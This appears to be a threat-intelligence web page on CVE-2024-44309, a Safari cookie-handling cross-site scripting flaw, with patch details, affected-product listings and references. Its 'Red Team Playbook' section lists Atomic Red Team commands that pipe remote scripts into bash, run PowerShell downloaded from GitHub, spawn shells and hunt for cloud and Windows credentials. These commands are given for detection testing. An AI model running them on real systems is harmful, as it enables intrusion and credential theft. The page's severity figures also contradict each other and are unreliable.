CVE-2024-44309
Overview
This vulnerability is a cross-site scripting (XSS) flaw rooted in improper cookie and state management within Apple Safari's web content processing engine. The issue arises from insufficient sanitization or validation of input data handled during cookie operations, allowing malicious scripts to be injected and executed. The affected components include Safari browser versions and related Apple operating system web frameworks handling cookie state.
Vulnerability Description
A cookie management issue was addressed with improved state management. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, iOS 18.1.1 and iPadOS 18.1.1, macOS Sequoia 15.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Impact
An attacker can execute arbitrary scripts within the context of the victim's browser session by delivering crafted web content, potentially leading to session hijacking, data theft, or unauthorized actions. Exploitation requires the user to visit a malicious or compromised website, with no authentication needed. This vulnerability has reportedly been exploited on Intel-based Mac systems, increasing the risk of targeted attacks against users running vulnerable Safari versions. The CVSS base score is 0, indicating low severity but active exploitation.
Solution
Apple has addressed this issue in Safari 18.1.1, iOS 17.7.2 and 18.1.1, iPadOS 17.7.2 and 18.1.1, macOS Sequoia 15.1.1, and visionOS 2.1.1. Users and administrators should apply these updates promptly to remediate the vulnerability. Detailed patch instructions and advisories are available at Apple Support pages: https://support.apple.com/en-us/121752, https://support.apple.com/en-us/121753, and https://support.apple.com/en-us/121754.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question revolves around a cookie management issue that has been identified in various Apple products, including Safari, iOS, iPadOS, macOS, and visionOS. This flaw arises from inadequate state management, which can lead to the processing of maliciously crafted web content. Such a weakness can potentially facilitate cross-site scripting (XSS) attacks, where an attacker injects malicious scripts into web pages viewed by users. The implications of this vulnerability are particularly concerning, as it allows for unauthorized access to sensitive information, session hijacking, and the execution of arbitrary code within the context of the affected browser or application.
Attack vectors exploiting this vulnerability primarily involve social engineering tactics, where users are tricked into visiting compromised or malicious websites. Once a user interacts with the malicious content, the attacker can execute scripts that manipulate cookies or session data. This can result in the theft of authentication tokens, allowing the attacker to impersonate the victim or gain unauthorized access to their accounts. Furthermore, the fact that this issue may have been actively exploited on Intel-based Mac systems indicates a heightened risk for users of these devices, as attackers may have already developed methods to leverage this vulnerability in real-world scenarios.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on web applications for customer interactions and data management. If exploited, the consequences could range from data breaches to reputational damage, as customers may lose trust in a company's ability to protect their information. Additionally, organizations could face regulatory scrutiny and financial penalties if sensitive data is compromised. The potential for widespread exploitation underscores the importance of addressing this vulnerability promptly to mitigate risks associated with data integrity and user privacy.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular updates and patches provided by Apple should be applied to all affected devices to ensure that the latest security enhancements are in place. Additionally, web application firewalls (WAFs) can be employed to filter out malicious traffic and prevent XSS attacks. Organizations should also conduct regular security audits and vulnerability assessments to identify and remediate weaknesses in their systems. User education is equally critical; training employees and customers about the risks of clicking on unknown links or visiting suspicious websites can significantly reduce the likelihood of successful exploitation.
In conclusion, the cookie management issue presents a notable threat to users of various Apple products, with the potential for serious consequences if left unaddressed. The combination of technical vulnerabilities, exploitation scenarios, and the associated business risks necessitates a proactive approach to security. By implementing robust detection and mitigation strategies, organizations can better protect themselves and their users from the adverse effects of this vulnerability, ensuring a safer online experience.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-44309, indicating increased adversary interest or opportunistic exploitation attempts. Our telemetry shows a significant uptick in indicators associated with this vulnerability, accompanied by a modest rise in the EPSS score, reflecting a growing likelihood of exploitation in the near term. Although no new exploit techniques or ransomware affiliations have been observed, the heightened detection trend suggests that threat actors may be intensifying reconnaissance or preliminary attack phases targeting affected Apple Safari versions. This development elevates the urgency for defenders to maintain vigilant monitoring and reinforces the medium severity rating, as the expanding exploitation footprint could translate into broader impact if leveraged effectively. Consequently, the risk posture for environments running vulnerable Apple platforms should be considered increasingly dynamic, warranting close attention to emerging activity patterns.
Update 2 — August 02, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-44309, indicating increased adversary engagement with this Safari cookie management vulnerability. Although the EPSS score has slightly declined, the surge in telemetry signals suggests that threat actors are intensifying reconnaissance or initial exploitation attempts, particularly targeting Intel-based Mac systems as previously noted. This divergence between exploit prediction metrics and actual detection trends underscores the evolving nature of the threat landscape, where adversaries may be probing defenses more aggressively despite a modest decrease in modeled exploit probability. Consequently, the risk posture for affected environments should be considered more dynamic, with a heightened potential for opportunistic exploitation that could lead to cross-site scripting attacks if successful. Defenders must recognize that the growing activity footprint reflects an active interest in this medium-severity vulnerability, reinforcing the need for continuous monitoring and timely patch application.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
|
|
Apple | Safari | All |
cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Visionos | All |
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-44309 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/121752 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/121753 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/121754 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/121755 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/121756 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Nov/16 |
| lists.debian.org |
NVD API
Mailing List
|
https://lists.debian.org/debian-lts-announce/2024/12/msg00003.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-44309 |